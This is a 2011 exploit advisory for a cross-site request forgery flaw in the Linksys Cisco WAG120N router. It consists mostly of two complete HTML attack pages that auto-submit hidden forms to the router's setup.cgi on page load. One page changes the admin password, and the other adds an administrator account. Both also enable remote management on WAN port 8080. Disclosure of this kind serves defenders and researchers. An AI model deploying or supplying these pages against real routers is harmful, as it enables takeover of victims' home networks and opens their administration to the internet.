Linksys Cisco WAG120N CSRF Vulnerability :: 2011-02-26
---------------------------------------------------------------- Hardware : Linksys Cisco Wag120n(And perhaps similar versions) Type of vunlnerability : CSRF ( Change Admin Password And Add User ) Risk of use : High ---------------------------------------------------------------- Producer Website : http://linksysbycisco.com ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- CSRF For Change Admin Password : #Use sysPasswd and sysConfirmPasswd to set new password <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/setup.cgi"; method="POST" name="form"> <input type="hidden" name="user_list" value="1"> <input type="hidden" name="h_user_list" value="1"> <input type="hidden" name="sysname" value="admin"> <input type="hidden" name="sysPasswd" value="password"> <input type="hidden" name="sysConfirmPasswd" value="password"> <input type="hidden" name="remote_management" value="enable"> <input type="hidden" name="http_wanport" value="8080"> <input type="hidden" name="upnp_enable" value="enable"> <input type="hidden" name="wlan_enable" value="enable"> <input type="hidden" name="igmp_proxy_enable" value="enable"> <input type="hidden" name="save" value="Save+Settings"> <input type="hidden" name="h_pwset" value="yes"> <input type="hidden" name="sysname_changed" value="yes"> <input type="hidden" name="pwchanged" value="yes"> <input type="hidden" name="pass_is_default" value="false"> <input type="hidden" name="h_remote_management" value="enable"> <input type="hidden" name="pass_is_none" value="no"> <input type="hidden" name="h_upnp_enable" value="enable"> <input type="hidden" name="h_wlan_enable" value="enable"> <input type="hidden" name="h_igmp_proxy_enable" value="enable"> <input type="hidden" name="todo" value="save"> <input type="hidden" name="this_file" value="Administration.htm"> <input type="hidden" name="next_file" value="Administration.htm"> <input type="hidden" name="message" value=""> <input type="hidden" name="h_wps_cur_status" value=""> </form> </body> </html> ---------------------------------------------------------------- CSRF For Add Administrator User: #Use sysPasswd and sysConfirmPasswd to set new password #if you add new user you should set pass_is_none=yes <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/setup.cgi"; method="POST" name="form"> <input type="hidden" name="user_list" value="2"> <input type="hidden" name="h_user_list" value="2"> <input type="hidden" name="sysname" value="ircrash"> <input type="hidden" name="sysPasswd" value="password"> <input type="hidden" name="sysConfirmPasswd" value="password"> <input type="hidden" name="remote_management" value="enable"> <input type="hidden" name="http_wanport" value="8080"> <input type="hidden" name="upnp_enable" value="enable"> <input type="hidden" name="wlan_enable" value="enable"> <input type="hidden" name="igmp_proxy_enable" value="enable"> <input type="hidden" name="save" value="Save+Settings"> <input type="hidden" name="h_pwset" value="yes"> <input type="hidden" name="sysname_changed" value="yes"> <input type="hidden" name="pwchanged" value="yes"> <input type="hidden" name="pass_is_default" value="false"> <input type="hidden" name="h_remote_management" value="enable"> <input type="hidden" name="pass_is_none" value="yes"> <input type="hidden" name="h_upnp_enable" value="enable"> <input type="hidden" name="h_wlan_enable" value="enable"> <input type="hidden" name="h_igmp_proxy_enable" value="enable"> <input type="hidden" name="todo" value="save"> <input type="hidden" name="this_file" value="Administration.htm"> <input type="hidden" name="next_file" value="Administration.htm"> <input type="hidden" name="message" value=""> <input type="hidden" name="h_wps_cur_status" value=""> </form> </body> </html>Download